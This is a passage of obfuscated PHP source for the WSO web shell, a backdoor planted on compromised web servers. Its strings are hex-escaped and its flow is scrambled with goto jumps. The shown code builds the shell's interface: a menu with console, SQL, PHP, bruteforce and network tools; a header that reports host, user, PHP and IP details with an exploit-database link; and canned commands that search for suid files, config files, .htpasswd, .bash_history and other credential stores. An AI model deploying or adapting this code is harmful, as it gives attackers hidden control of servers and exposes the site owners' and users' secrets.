"\74\57\160\162\x65\x3e\x3c\57\x64\x69\x76\x3e\74\x62\x72\76\74\150\x31\76\x53\145\x61\162\x63\x68\x20\x66\151\x6c\x65\x73\72\74\57\150\x31\x3e\74\144\151\x76\x20\143\154\x61\x73\x73\x3d\143\157\x6e\164\145\x6e\164\x3e\xd\12\x9\11\x3c\146\157\162\155\x20\x6f\x6e\x73\x75\x62\155\151\164\75\x22\x67\50\x6e\165\x6c\154\x2c\164\x68\x69\163\x2e\x63\x77\144\x2e\x76\141\x6c\165\145\54\x6e\x75\154\x6c\54\x74\150\151\x73\x2e\164\x65\x78\164\56\x76\141\154\165\x65\x2c\x74\x68\151\x73\x2e\146\x69\154\145\x6e\141\155\x65\x2e\166\x61\x6c\165\x65\x29\73\x72\145\164\x75\162\x6e\40\146\141\154\x73\145\73\x22\76\74\164\141\142\x6c\x65\x20\x63\145\x6c\154\160\x61\144\x64\151\156\147\x3d\x27\x31\x27\40\143\145\x6c\x6c\x73\160\x61\x63\151\156\147\75\x27\x30\47\x20\x77\151\144\x74\150\75\47\x35\60\x25\x27\76\xd\12\11\11\x9\74\x74\162\x3e\x3c\x74\144\40\167\x69\x64\x74\150\x3d\47\61\45\47\x3e\124\145\170\x74\72\x3c\57\164\x64\x3e\74\164\144\76\74\151\156\x70\x75\x74\40\164\x79\x70\145\x3d\47\x74\145\x78\x74\47\x20\x6e\141\155\x65\75\x27\x74\x65\x78\164\x27\40\x73\164\171\154\145\x3d\47\x77\x69\144\164\150\72\61\x30\x30\x25\47\x3e\74\57\x74\x64\x3e\74\57\x74\162\x3e\xd\xa\x9\x9\11\x3c\164\162\76\74\164\x64\76\x50\141\164\150\x3a\74\57\x74\144\76\74\x74\x64\76\x3c\151\156\x70\x75\164\40\164\x79\x70\145\75\x27\164\x65\x78\164\47\x20\x6e\141\155\145\x3d\47\143\x77\x64\47\40\x76\141\154\x75\145\75\x27" . htmlspecialchars($GLOBALS["\x63\x77\144"]) . "\47\x20\163\164\x79\x6c\x65\75\x27\167\x69\x64\x74\x68\72\61\x30\x30\x25\47\76\74\x2f\164\x64\76\x3c\x2f\x74\x72\76\xd\xa\11\11\11\74\x74\x72\x3e\x3c\164\144\76\116\x61\x6d\145\72\x3c\57\164\x64\x3e\74\x74\144\76\74\x69\156\x70\x75\x74\40\x74\171\x70\x65\75\47\164\x65\x78\x74\47\x20\156\141\155\145\75\x27\x66\151\x6c\x65\156\x61\x6d\x65\x27\40\166\141\154\x75\x65\75\47\52\47\40\x73\x74\x79\x6c\145\75\47\167\151\x64\x74\150\72\x31\60\60\45\47\76\74\57\x74\144\x3e\74\57\x74\x72\x3e\15\xa\x9\11\11\x3c\x74\162\76\x3c\164\x64\76\74\x2f\164\144\76\x3c\x74\x64\76\74\x69\156\160\165\x74\x20\164\171\160\145\75\47\x73\165\x62\155\151\164\x27\40\x76\141\x6c\x75\x65\x3d\47\x3e\x3e\x27\76\74\x2f\x74\144\76\74\57\164\162\76\xd\xa\11\x9\11\74\57\x74\141\x62\154\x65\76\74\57\146\x6f\162\155\76"; goto awjDW; IHtdM: $stringTools = array("\x42\141\163\145\66\x34\40\145\x6e\143\157\144\x65" => "\142\141\x73\145\x36\x34\137\145\x6e\x63\157\x64\x65", "\x42\x61\x73\145\x36\x34\x20\x64\x65\143\157\x64\x65" => "\142\x61\x73\x65\66\x34\x5f\x64\145\143\x6f\144\x65", "\125\x72\x6c\x20\145\x6e\x63\157\x64\x65" => "\165\x72\x6c\x65\156\x63\157\144\145", "\x55\162\154\x20\144\145\x63\157\x64\x65" => "\x75\162\154\144\145\143\157\144\145", "\x46\165\x6c\154\40\x75\162\x6c\x65\156\x63\157\x64\145" => "\146\x75\154\x6c\137\165\x72\x6c\x65\x6e\x63\157\x64\x65", "\x6d\x64\65\40\150\141\163\x68" => "\x6d\x64\65", "\163\x68\x61\61\x20\x68\x61\x73\x68" => "\x73\150\141\61", "\143\162\171\x70\x74" => "\143\x72\x79\x70\x74", "\x43\x52\x43\x33\62" => "\x63\162\x63\63\x32", "\x41\123\103\x49\111\40\x74\157\x20\110\x45\130" => "\141\163\143\151\x69\62\150\x65\170", "\110\x45\130\40\x74\x6f\x20\x41\x53\x43\x49\x49" => "\x68\145\170\x32\141\x73\143\151\151", "\x48\x45\130\40\x74\x6f\40\x44\105\x43" => "\x68\145\x78\144\x65\x63", "\x48\x45\x58\40\x74\157\40\102\111\x4e" => "\150\145\x78\x32\142\151\156", "\x44\x45\x43\40\164\157\x20\x48\105\x58" => "\x64\x65\143\150\145\x78", "\104\x45\103\x20\164\x6f\40\x42\x49\x4e" => "\x64\145\x63\142\151\x6e", "\102\x49\116\40\164\157\40\x48\105\x58" => "\142\x69\x6e\150\145\170", "\x42\111\x4e\x20\x74\157\x20\x44\x45\103" => "\x62\151\x6e\144\145\x63", "\123\164\x72\x69\156\147\x20\164\x6f\x20\154\x6f\x77\145\162\40\143\x61\x73\145" => "\x73\x74\162\164\x6f\x6c\x6f\x77\x65\x72", "\x53\164\x72\x69\156\x67\40\164\x6f\40\x75\160\160\x65\162\x20\143\141\163\x65" => "\x73\164\162\164\x6f\165\160\x70\x65\x72", "\110\x74\155\x6c\163\x70\145\x63\x69\141\154\143\150\141\162\163" => "\150\x74\155\154\163\x70\x65\143\151\x61\154\x63\150\x61\x72\163", "\123\x74\x72\151\156\x67\40\154\x65\156\x67\x74\x68" => "\163\x74\162\154\145\x6e"); goto N3xOi; JMM51: } goto xB4MH; sO9OV: $cwd = @getcwd(); goto cUzsD; SG2I5: function WSOstripslashes($array) { return is_array($array) ? array_map("\x57\x53\117\x73\x74\162\151\160\163\154\141\163\x68\x65\x73", $array) : stripslashes($array); } goto M9YJl; EoPoZ: if ($os == "\x77\151\156") { $aliases = array("\114\x69\163\x74\40\104\x69\162\145\143\x74\x6f\162\x79" => "\x64\x69\x72", "\x46\x69\156\144\40\x69\156\x64\x65\x78\56\160\150\x70\40\x69\x6e\40\x63\x75\162\162\145\x6e\x74\40\144\151\162" => "\144\151\x72\40\x2f\x73\x20\x2f\167\x20\x2f\x62\x20\151\156\x64\x65\x78\56\160\x68\160", "\x46\x69\x6e\144\x20\x2a\x63\x6f\156\146\x69\x67\52\56\160\150\160\x20\x69\x6e\x20\143\165\x72\x72\x65\x6e\164\40\x64\151\x72" => "\144\151\162\x20\x2f\x73\x20\x2f\167\x20\57\x62\x20\x2a\x63\x6f\156\x66\151\147\x2a\56\160\x68\x70", "\x53\150\157\167\40\141\143\x74\x69\166\x65\40\143\157\156\156\145\x63\x74\x69\157\x6e\x73" => "\x6e\x65\x74\163\x74\141\164\40\55\141\156", "\x53\x68\x6f\x77\x20\x72\x75\156\x6e\151\x6e\x67\x20\x73\145\x72\x76\151\143\x65\163" => "\156\x65\x74\40\163\x74\141\x72\x74", "\x55\163\x65\162\x20\x61\x63\x63\157\165\x6e\164\163" => "\x6e\145\164\40\x75\x73\145\162", "\123\150\x6f\167\x20\x63\157\155\160\x75\164\145\x72\x73" => "\156\145\x74\x20\166\151\145\x77", "\101\122\120\40\124\141\142\154\x65" => "\x61\162\x70\40\x2d\141", "\111\120\x20\103\x6f\x6e\x66\151\147\165\162\141\x74\x69\157\156" => "\151\x70\143\157\x6e\x66\x69\x67\x20\x2f\141\x6c\x6c"); } else { $aliases = array("\114\x69\x73\164\x20\x64\151\162" => "\154\x73\40\x2d\154\x68\141", "\x6c\x69\x73\x74\x20\146\x69\x6c\x65\x20\x61\164\x74\162\151\x62\165\x74\x65\x73\40\x6f\156\40\141\x20\x4c\151\x6e\165\x78\40\x73\x65\x63\157\156\144\40\145\170\164\x65\x6e\x64\x65\x64\x20\x66\151\x6c\145\x20\x73\171\163\x74\145\155" => "\x6c\x73\x61\164\164\x72\40\55\x76\x61", "\163\x68\157\167\x20\157\160\x65\156\x65\x64\x20\160\x6f\x72\164\x73" => "\x6e\x65\x74\163\164\x61\164\x20\x2d\141\156\x20\174\40\x67\x72\x65\160\x20\x2d\151\40\154\x69\x73\x74\x65\x6e", "\160\162\x6f\143\x65\x73\163\x20\x73\164\141\164\x75\163" => "\x70\x73\x20\141\x75\x78", "\106\151\x6e\144" => '', "\146\x69\x6e\x64\x20\141\154\x6c\x20\x73\x75\x69\x64\40\x66\151\154\x65\163" => "\x66\151\156\x64\40\x2f\40\x2d\x74\171\160\145\x20\146\40\55\x70\x65\162\x6d\x20\x2d\x30\x34\x30\60\60\x20\x2d\154\163", "\146\151\156\144\x20\x73\x75\x69\x64\x20\146\x69\154\145\163\x20\x69\x6e\x20\x63\165\x72\162\x65\156\164\40\144\x69\162" => "\146\151\156\144\x20\56\40\x2d\x74\x79\160\x65\40\x66\x20\55\x70\x65\162\x6d\x20\55\60\64\60\60\60\x20\55\154\x73", "\x66\151\156\144\x20\141\154\154\x20\163\x67\x69\144\40\x66\151\154\x65\x73" => "\146\x69\x6e\x64\x20\x2f\40\x2d\164\x79\160\x65\40\146\x20\x2d\160\x65\162\155\40\x2d\x30\62\x30\60\60\40\55\154\163", "\146\x69\156\144\40\163\x67\151\144\40\x66\151\x6c\145\x73\40\x69\156\40\143\165\x72\x72\145\x6e\164\40\x64\151\162" => "\146\151\x6e\x64\40\x2e\40\x2d\164\x79\x70\x65\40\x66\40\x2d\x70\x65\162\155\40\55\x30\x32\x30\x30\60\x20\55\x6c\x73", "\146\x69\156\144\40\x63\x6f\x6e\x66\151\x67\x2e\151\156\143\x2e\x70\x68\160\40\x66\x69\x6c\x65\163" => "\x66\151\x6e\x64\40\57\x20\x2d\x74\171\x70\x65\40\x66\40\55\156\x61\x6d\145\x20\x63\157\156\x66\x69\147\x2e\151\x6e\143\56\x70\150\x70", "\x66\151\x6e\x64\40\x63\x6f\156\x66\151\147\52\x20\146\151\x6c\x65\x73" => "\146\x69\156\x64\40\57\x20\x2d\x74\x79\x70\x65\40\146\40\x2d\156\141\x6d\145\x20\42\x63\x6f\156\x66\x69\x67\52\42", "\x66\151\156\144\x20\143\157\156\146\x69\147\52\40\146\151\154\145\x73\x20\x69\156\40\x63\165\x72\162\145\156\164\40\144\151\162" => "\x66\151\156\x64\x20\x2e\40\x2d\x74\x79\160\145\40\146\40\55\156\x61\155\x65\x20\x22\143\x6f\156\x66\x69\147\x2a\x22", "\146\x69\x6e\x64\x20\x61\154\154\40\x77\x72\151\x74\x61\142\154\145\40\x66\157\154\x64\x65\162\163\40\141\156\144\40\x66\151\154\x65\x73" => "\x66\151\x6e\144\40\x2f\x20\x2d\160\145\x72\x6d\x20\x2d\x32\40\x2d\154\163", "\146\151\x6e\144\x20\x61\x6c\x6c\40\167\162\151\x74\x61\x62\154\x65\40\146\x6f\154\144\x65\x72\x73\40\141\156\144\x20\x66\151\154\x65\163\x20\151\156\40\x63\x75\x72\x72\145\156\164\x20\x64\151\x72" => "\146\x69\x6e\x64\40\x2e\x20\x2d\x70\x65\x72\155\x20\x2d\x32\x20\55\154\163", "\x66\x69\156\x64\40\x61\154\154\x20\x73\x65\x72\x76\151\x63\145\x2e\160\167\x64\40\146\151\154\x65\x73" => "\146\151\156\x64\x20\57\40\x2d\164\x79\160\145\40\146\40\x2d\x6e\141\155\x65\40\x73\x65\x72\166\151\x63\x65\x2e\160\x77\x64", "\146\151\156\144\x20\163\145\162\166\151\143\145\x2e\160\167\144\x20\146\x69\x6c\145\x73\x20\x69\156\40\143\x75\x72\162\145\x6e\x74\x20\x64\x69\162" => "\x66\151\x6e\x64\40\x2e\40\x2d\x74\171\x70\145\x20\146\40\55\156\x61\x6d\145\40\x73\x65\162\x76\151\143\145\56\160\167\144", "\146\151\x6e\144\x20\x61\154\x6c\40\x2e\x68\x74\x70\141\163\163\167\x64\40\146\x69\154\x65\x73" => "\x66\x69\x6e\144\40\x2f\40\x2d\x74\171\x70\x65\x20\146\x20\55\156\141\x6d\145\x20\56\150\x74\x70\x61\163\163\167\x64", "\146\151\156\x64\x20\x2e\x68\x74\160\x61\163\163\167\144\40\x66\151\x6c\145\x73\40\151\156\40\x63\165\x72\x72\x65\x6e\164\x20\144\151\x72" => "\x66\151\x6e\x64\x20\56\40\55\x74\171\160\x65\x20\146\40\x2d\x6e\141\155\x65\x20\x2e\150\x74\x70\x61\x73\x73\167\144", "\146\151\156\x64\x20\x61\154\x6c\x20\x2e\x62\x61\163\x68\137\150\x69\163\164\x6f\162\171\x20\146\x69\154\145\163" => "\x66\x69\156\144\x20\x2f\x20\55\x74\x79\160\x65\40\146\x20\x2d\156\141\x6d\x65\x20\x2e\142\141\x73\150\137\x68\151\x73\164\x6f\162\171", "\146\x69\x6e\x64\x20\56\142\141\x73\150\137\150\x69\163\x74\157\x72\171\40\x66\151\154\x65\x73\x20\151\156\x20\143\165\162\x72\x65\x6e\164\x20\144\x69\162" => "\146\x69\156\144\x20\56\x20\x2d\164\x79\160\x65\x20\146\40\x2d\156\x61\x6d\145\40\56\x62\141\163\150\x5f\150\151\x73\x74\x6f\162\171", "\x66\151\156\144\40\x61\x6c\154\x20\56\x66\x65\164\x63\150\x6d\x61\x69\x6c\x72\143\x20\146\x69\154\145\163" => "\x66\x69\x6e\x64\40\x2f\x20\55\x74\171\160\x65\x20\146\x20\x2d\156\x61\x6d\x65\40\56\x66\x65\x74\143\150\155\x61\x69\x6c\x72\x63", "\146\151\x6e\x64\x20\x2e\x66\x65\164\x63\x68\155\141\151\154\x72\143\40\x66\151\x6c\x65\x73\40\x69\x6e\x20\143\165\x72\162\x65\156\x74\x20\144\x69\x72" => "\146\x69\156\144\x20\x2e\40\x2d\x74\171\160\145\40\x66\x20\x2d\x6e\141\x6d\x65\x20\x2e\x66\145\x74\143\x68\x6d\141\x69\x6c\162\143", "\x4c\157\143\141\164\x65" => '', "\x6c\157\x63\141\164\145\40\150\164\x74\160\x64\x2e\143\x6f\x6e\x66\40\146\151\x6c\145\x73" => "\154\157\x63\x61\x74\x65\40\x68\164\164\160\x64\x2e\x63\157\156\x66", "\x6c\x6f\143\141\164\145\x20\166\x68\157\x73\x74\x73\x2e\x63\157\156\x66\x20\146\x69\x6c\x65\x73" => "\154\157\143\141\164\145\40\166\150\157\163\164\163\x2e\143\x6f\156\x66", "\154\157\x63\x61\164\x65\x20\x70\x72\157\146\x74\160\x64\56\143\x6f\156\146\x20\x66\x69\154\x65\163" => "\154\x6f\143\141\x74\145\40\x70\162\157\146\164\x70\144\x2e\x63\x6f\x6e\x66", "\154\x6f\x63\x61\x74\x65\x20\x70\163\171\x62\156\143\x2e\143\x6f\156\x66\40\x66\151\154\145\x73" => "\154\x6f\143\x61\x74\x65\x20\160\163\171\x62\156\x63\56\x63\x6f\x6e\146", "\x6c\x6f\143\141\x74\145\x20\155\x79\56\x63\x6f\156\x66\40\x66\x69\x6c\x65\163" => "\154\157\143\141\164\145\40\155\171\x2e\x63\157\x6e\x66", "\x6c\x6f\x63\x61\x74\x65\x20\141\x64\x6d\151\x6e\x2e\160\150\160\40\146\151\x6c\145\163" => "\x6c\157\x63\x61\164\x65\40\141\144\155\x69\x6e\56\160\150\x70", "\x6c\157\143\x61\164\145\x20\x63\146\147\56\160\150\x70\x20\x66\x69\154\x65\x73" => "\x6c\x6f\x63\x61\164\145\x20\x63\x66\147\56\160\x68\x70", "\154\157\143\141\x74\145\40\x63\x6f\x6e\x66\56\160\150\x70\40\x66\151\154\x65\163" => "\154\x6f\x63\141\x74\x65\40\143\157\x6e\146\56\160\x68\x70", "\154\x6f\143\141\164\x65\x20\143\157\x6e\x66\151\x67\56\x64\141\x74\x20\146\x69\154\x65\163" => "\x6c\157\x63\x61\x74\x65\40\x63\x6f\156\x66\151\x67\x2e\144\141\x74", "\x6c\157\x63\x61\164\x65\40\x63\157\156\146\151\x67\56\160\x68\x70\40\146\x69\x6c\x65\163" => "\x6c\x6f\x63\x61\164\145\x20\143\x6f\x6e\146\x69\147\x2e\160\150\x70", "\154\157\143\141\x74\145\40\143\157\156\x66\151\x67\56\151\156\143\x20\146\151\154\145\163" => "\x6c\157\143\141\164\x65\x20\143\x6f\156\x66\151\147\x2e\151\x6e\x63", "\x6c\x6f\143\141\x74\x65\x20\143\x6f\156\146\x69\147\56\x69\156\143\56\160\150\x70" => "\x6c\x6f\x63\x61\x74\145\x20\143\157\x6e\146\151\147\56\151\156\x63\56\160\x68\x70", "\x6c\157\143\141\x74\x65\x20\143\157\156\146\151\147\56\x64\x65\146\141\x75\154\x74\56\160\x68\160\x20\x66\151\x6c\145\163" => "\x6c\x6f\x63\141\164\x65\x20\143\157\156\x66\151\x67\56\x64\x65\146\141\x75\154\164\x2e\x70\x68\160", "\x6c\157\x63\x61\164\x65\40\143\157\156\146\151\x67\x2a\40\x66\x69\154\145\x73\x20" => "\x6c\157\x63\141\x74\x65\x20\x63\157\x6e\146\151\147", "\154\157\x63\141\164\x65\x20\56\143\x6f\156\x66\x20\x66\151\x6c\145\163" => "\154\x6f\143\141\164\x65\40\x27\x2e\x63\x6f\x6e\146\x27", "\154\x6f\x63\141\164\x65\40\56\x70\167\144\40\146\151\154\x65\163" => "\x6c\157\x63\141\164\x65\x20\47\x2e\x70\167\x64\47", "\x6c\157\143\141\164\145\x20\x2e\163\161\154\x20\x66\151\154\145\x73" => "\x6c\x6f\x63\x61\x74\145\x20\x27\56\x73\161\x6c\x27", "\154\x6f\143\x61\x74\x65\40\56\x68\164\x70\141\x73\163\x77\144\x20\x66\151\154\145\163" => "\154\x6f\x63\x61\164\x65\x20\x27\x2e\150\164\160\x61\x73\163\167\x64\x27", "\x6c\x6f\143\141\x74\x65\40\x2e\x62\141\163\x68\x5f\x68\x69\163\x74\157\x72\171\40\x66\151\x6c\145\163" => "\154\x6f\143\141\x74\x65\40\47\x2e\x62\x61\x73\x68\x5f\x68\151\x73\164\157\x72\171\47", "\154\x6f\143\141\x74\x65\40\x2e\155\x79\163\161\x6c\x5f\x68\151\x73\164\x6f\162\171\x20\x66\x69\154\x65\163" => "\x6c\x6f\x63\x61\164\x65\x20\47\x2e\155\171\163\x71\154\137\150\151\x73\x74\x6f\162\171\x27", "\154\x6f\x63\x61\x74\145\40\x2e\146\145\164\x63\x68\x6d\x61\x69\154\x72\143\x20\146\151\x6c\145\163" => "\154\157\143\141\164\145\40\x27\56\x66\145\164\143\x68\155\141\x69\x6c\162\143\47", "\154\157\x63\x61\x74\145\x20\x62\x61\143\153\x75\x70\40\146\x69\x6c\145\163" => "\x6c\157\143\x61\164\145\x20\x62\x61\x63\x6b\x75\x70", "\154\x6f\143\x61\x74\x65\40\144\x75\x6d\160\x20\x66\151\154\145\163" => "\154\157\x63\x61\x74\145\40\x64\x75\155\160", "\154\157\143\x61\164\145\x20\160\x72\x69\x76\x20\146\x69\154\145\163" => "\154\x6f\143\141\164\x65\x20\x70\x72\x69\166"); } goto MrsTM; Cjo7J: $color = "\x23\144\x66\65"; goto LNmAT; ocXfq: $_COOKIE = WSOstripslashes($_COOKIE); goto Qn_9k; dPSqc: if (empty($_POST["\x61"])) { if (isset($default_action) && function_exists("\141\x63\x74\151\157\156" . $default_action)) { $_POST["\141"] = $default_action; } else { $_POST["\141"] = "\123\145\143\111\x6e\x66\x6f"; } } goto j2Rfu; fj9OS: if ($argc == 3) { $_POST = unserialize(base64_decode($argv[1])); $_SERVER = unserialize(base64_decode($argv[2])); } goto GFRHq; MrsTM: function wsoHeader() { goto E9rcc; FKql5: echo "\74\164\x61\142\x6c\x65\x20\x63\x6c\x61\163\x73\x3d\151\156\146\x6f\40\143\145\154\x6c\160\141\144\144\x69\156\x67\75\x33\x20\x63\x65\x6c\x6c\x73\x70\x61\x63\x69\156\147\75\x30\40\x77\x69\144\x74\x68\x3d\x31\60\60\45\x3e\x3c\x74\x72\x3e\x3c\164\144\x20\167\x69\x64\164\x68\75\61\x3e\x3c\163\160\141\156\76\x55\x6e\x61\155\145\x3a\x3c\x62\162\76\x55\x73\145\x72\72\x3c\x62\162\x3e\x50\x68\160\72\x3c\142\162\x3e\x48\x64\x64\72\x3c\142\x72\76\103\x77\x64\x3a" . ($GLOBALS["\x6f\163"] == "\x77\151\x6e" ? "\x3c\x62\x72\76\x44\x72\151\x76\x65\163\x3a" : '') . "\74\x2f\x73\160\141\156\x3e\x3c\57\x74\x64\76" . "\x3c\164\x64\x3e\74\x6e\157\142\x72\76" . substr(@php_uname(), 0, 120) . "\x20\x3c\141\40\x68\x72\x65\146\x3d\x22" . $explink . "\x22\40\164\141\x72\x67\145\x74\x3d\137\x62\x6c\x61\156\153\76\x5b\x65\x78\x70\154\157\x69\x74\x2d\x64\142\56\143\157\155\135\x3c\x2f\x61\76\74\x2f\x6e\157\x62\x72\x3e\74\x62\162\x3e" . $uid . "\x20\50\40" . $user . "\40\x29\x20\74\x73\x70\x61\156\76\107\162\x6f\165\160\x3a\74\57\x73\160\x61\x6e\76\40" . $gid . "\40\50\40" . $group . "\x20\51\x3c\x62\x72\x3e" . @phpversion() . "\x20\74\x73\160\141\x6e\x3e\x53\x61\146\x65\x20\x6d\157\x64\x65\x3a\74\x2f\163\160\x61\x6e\x3e\40" . ($GLOBALS["\163\141\x66\145\x5f\155\157\x64\145"] ? "\74\x66\157\156\164\40\x63\x6f\x6c\x6f\x72\x3d\x72\x65\x64\76\117\116\74\57\x66\157\156\x74\x3e" : "\x3c\146\x6f\x6e\x74\x20\x63\x6f\x6c\x6f\162\75\x67\x72\145\x65\x6e\76\74\142\x3e\x4f\106\106\x3c\x2f\142\76\74\x2f\146\x6f\156\x74\76") . "\40\x3c\x61\x20\x68\x72\145\x66\x3d\x23\x20\x6f\156\143\x6c\x69\x63\153\x3d\x22\147\x28\x27\120\x68\160\47\54\156\x75\154\x6c\x2c\x27\47\54\x27\x69\x6e\x66\157\47\51\x22\x3e\x5b\40\x70\x68\x70\x69\156\146\x6f\x20\135\74\57\141\76\40\x3c\163\160\141\x6e\76\104\x61\x74\x65\x74\151\x6d\145\x3a\x3c\57\x73\160\141\156\76\40" . date("\131\55\x6d\55\144\x20\x48\72\x69\72\163") . "\74\142\162\76" . wsoViewSize($totalSpace) . "\x20\74\x73\x70\x61\x6e\x3e\106\x72\145\x65\72\x3c\x2f\163\160\x61\x6e\76\x20" . wsoViewSize($freeSpace) . "\x20\50" . (int) ($freeSpace / $totalSpace * 100) . "\45\x29\x3c\x62\x72\76" . $cwd_links . "\x20" . wsoPermsColor($GLOBALS["\x63\167\x64"]) . "\x20\74\x61\40\150\x72\145\146\75\x23\40\157\x6e\x63\154\x69\143\153\75\x22\x67\50\47\x46\151\x6c\145\163\x4d\141\x6e\47\54\47" . $GLOBALS["\x68\157\155\x65\137\143\x77\144"] . "\47\x2c\x27\x27\54\47\47\54\47\x27\x29\x22\x3e\133\x20\150\157\155\145\x20\x5d\x3c\57\x61\76\74\x62\x72\76" . $drives . "\x3c\57\x74\x64\76" . "\x3c\164\x64\40\x77\151\x64\x74\x68\75\x31\x20\x61\154\151\x67\156\x3d\x72\151\x67\x68\164\x3e\74\x6e\157\x62\x72\x3e\x3c\163\145\x6c\x65\x63\x74\x20\x6f\156\x63\x68\x61\156\147\145\x3d\x22\147\x28\x6e\x75\154\154\x2c\x6e\x75\154\154\54\156\165\x6c\x6c\x2c\156\x75\154\154\54\x6e\165\x6c\x6c\x2c\x74\x68\151\163\56\x76\141\154\x75\145\x29\x22\76\x3c\157\x70\x74\x67\162\x6f\x75\160\40\154\141\x62\x65\154\x3d\x22\120\x61\x67\145\x20\143\150\x61\x72\x73\x65\x74\x22\x3e" . $opt_charsets . "\74\57\157\x70\164\147\162\x6f\165\160\x3e\74\57\163\x65\x6c\145\143\164\76\74\142\x72\x3e\74\x73\x70\141\156\76\x53\x65\x72\166\x65\x72\x20\x49\x50\x3a\x3c\57\163\160\141\x6e\76\74\142\x72\x3e" . @$_SERVER["\123\105\x52\126\105\x52\x5f\101\x44\x44\x52"] . "\x3c\142\x72\x3e\x3c\163\x70\x61\x6e\76\103\154\151\x65\156\164\40\x49\x50\x3a\x3c\57\163\160\141\156\x3e\x3c\142\x72\76" . $_SERVER["\122\105\x4d\117\x54\105\137\x41\x44\x44\122"] . "\x3c\x2f\x6e\x6f\x62\162\76\74\x2f\164\x64\x3e\x3c\57\164\x72\x3e\x3c\57\164\141\x62\154\x65\x3e" . "\x3c\x74\141\142\x6c\145\x20\x73\x74\171\154\x65\75\x22\x62\x6f\x72\144\x65\162\55\x74\x6f\160\x3a\62\x70\x78\40\163\157\x6c\151\144\x20\x23\63\63\x33\73\x22\40\143\x65\x6c\154\160\141\x64\144\x69\156\x67\75\x33\x20\x63\x65\x6c\x6c\163\x70\x61\x63\x69\156\147\x3d\60\x20\167\151\x64\x74\150\x3d\61\x30\60\x25\76\x3c\x74\162\76" . $menu . "\74\x2f\164\162\76\x3c\x2f\x74\141\142\154\145\x3e\x3c\x64\151\x76\40\x73\x74\171\154\145\x3d\x22\155\x61\162\x67\151\156\x3a\x35\42\x3e"; goto RzURU; M4wyI: $m = array("\x53\145\x63\56\40\x49\x6e\x66\x6f" => "\x53\145\x63\x49\x6e\x66\157", "\x46\x69\x6c\145\163" => "\106\x69\154\145\163\115\141\x6e", "\103\x6f\156\163\157\154\145" => "\x43\157\x6e\x73\157\x6c\145", "\123\161\x6c" => "\123\x71\154", "\120\x68\160" => "\120\x68\x70", "\x53\164\x72\x69\x6e\147\40\x74\157\x6f\154\163" => "\123\x74\x72\151\156\x67\x54\x6f\157\x6c\x73", "\102\x72\x75\164\x65\146\157\162\143\x65" => "\102\162\165\x74\x65\x66\157\x72\143\145", "\x4e\145\164\x77\157\x72\x6b" => "\116\x65\164\167\157\x72\153"); goto JIPap; XR0lk: $totalSpace = $totalSpace ? $totalSpace : 1; goto gDdS4; QoI2U: $drives = ''; goto dJUUJ; E9rcc: if (empty($_POST["\143\150\141\x72\x73\145\164"])) { $_POST["\x63\x68\x61\x72\163\145\164"] = $GLOBALS["\144\145\146\141\x75\154\x74\137\143\150\141\x72\x73\x65\x74"]; } goto wwJNm; yWMQp: $charsets = array("\125\124\x46\x2d\x38", "\127\151\x6e\144\x6f\x77\163\55\61\62\65\x31", "\113\117\x49\70\55\x52", "\113\x4f\x49\x38\55\x55", "\x63\x70\70\x36\66"); goto QAzn_; JIPap: if (!empty($GLOBALS["\x61\x75\164\150\137\x70\x61\x73\x73"])) { $m["\x4c\x6f\x67\157\x75\164"] = "\x4c\x6f\147\x6f\165\164"; } goto hedz2; nmRB7: echo "\x3c\150\164\155\154\x3e\74\x68\145\141\144\76\74\x6d\145\164\141\x20\x68\x74\164\160\55\x65\x71\x75\x69\x76\x3d\x27\x43\x6f\156\164\x65\156\x74\x2d\x54\171\160\145\x27\40\143\157\x6e\x74\145\x6e\x74\75\x27\x74\x65\170\x74\x2f\x68\x74\x6d\x6c\x3b\40\x63\x68\x61\x72\x73\x65\x74\75" . $_POST["\143\x68\141\162\163\x65\164"] . "\x27\76\x3c\x74\x69\x74\154\x65\x3e" . $_SERVER["\110\124\x54\x50\137\110\117\x53\x54"] . "\x20\x2d\40\x57\x53\117\40" . WSO_VERSION . "\74\x2f\x74\151\164\x6c\145\x3e\xd\12\x3c\163\164\x79\154\x65\x3e\15\xa\x62\x6f\144\x79\173\x62\141\143\153\x67\162\x6f\165\156\144\55\143\157\x6c\x6f\x72\x3a\x23\x34\x34\x34\x3b\x63\157\154\157\162\72\x23\x65\61\145\x31\145\x31\x3b\x7d\15\xa\142\x6f\x64\x79\x2c\x74\144\54\164\150\173\x20\x66\157\156\x74\72\40\71\x70\164\40\114\165\x63\x69\144\141\x2c\x56\145\162\144\x61\x6e\141\73\155\x61\x72\x67\151\156\x3a\x30\73\x76\145\x72\164\x69\143\141\154\x2d\141\154\x69\147\156\72\164\x6f\x70\73\143\157\x6c\157\x72\x3a\x23\x65\61\x65\x31\145\x31\x3b\x20\x7d\xd\xa\x74\x61\142\x6c\145\56\151\156\x66\x6f\173\40\143\157\x6c\157\x72\72\43\x66\146\146\73\x62\x61\143\x6b\147\x72\x6f\165\x6e\x64\x2d\x63\157\x6c\x6f\x72\72\43\62\62\62\x3b\x20\x7d\15\xa\163\x70\141\156\x2c\150\61\x2c\141\173\40\x63\157\x6c\157\162\x3a\40{$color}\40\x21\x69\155\x70\157\x72\x74\141\156\164\73\x20\x7d\xd\12\163\x70\141\x6e\173\40\x66\x6f\156\x74\55\167\x65\151\147\x68\164\x3a\x20\142\x6f\154\144\145\x72\x3b\40\175\xd\12\x68\61\173\40\x62\157\162\x64\145\x72\55\154\145\146\x74\72\x35\160\x78\40\163\x6f\154\151\x64\x20{$color}\73\160\x61\x64\144\x69\156\147\x3a\40\62\x70\x78\40\x35\x70\170\x3b\146\157\156\x74\x3a\40\61\x34\x70\x74\x20\x56\145\x72\x64\141\156\141\x3b\142\x61\x63\153\147\162\157\x75\x6e\144\55\x63\157\154\157\x72\x3a\43\62\x32\x32\73\155\x61\x72\x67\151\x6e\x3a\x30\x70\x78\x3b\40\175\xd\12\144\x69\166\56\x63\157\156\164\x65\x6e\x74\173\40\160\141\144\144\151\156\147\x3a\40\x35\160\x78\73\155\141\162\147\151\156\55\154\145\146\164\x3a\x35\160\x78\73\x62\141\x63\x6b\147\162\157\165\156\144\55\143\157\154\157\162\x3a\x23\x33\x33\x33\x3b\40\175\xd\xa\141\173\40\x74\x65\170\x74\55\x64\145\143\x6f\162\x61\x74\x69\157\x6e\x3a\x6e\157\156\145\73\x20\x7d\xd\xa\x61\x3a\150\157\x76\145\162\173\40\x74\145\170\x74\x2d\144\x65\x63\157\x72\141\164\151\157\156\x3a\165\156\x64\145\162\x6c\x69\x6e\x65\x3b\40\175\15\xa\x2e\155\154\x31\173\40\x62\x6f\x72\x64\145\x72\x3a\61\160\170\40\163\157\x6c\x69\144\40\x23\64\64\x34\x3b\x70\x61\x64\x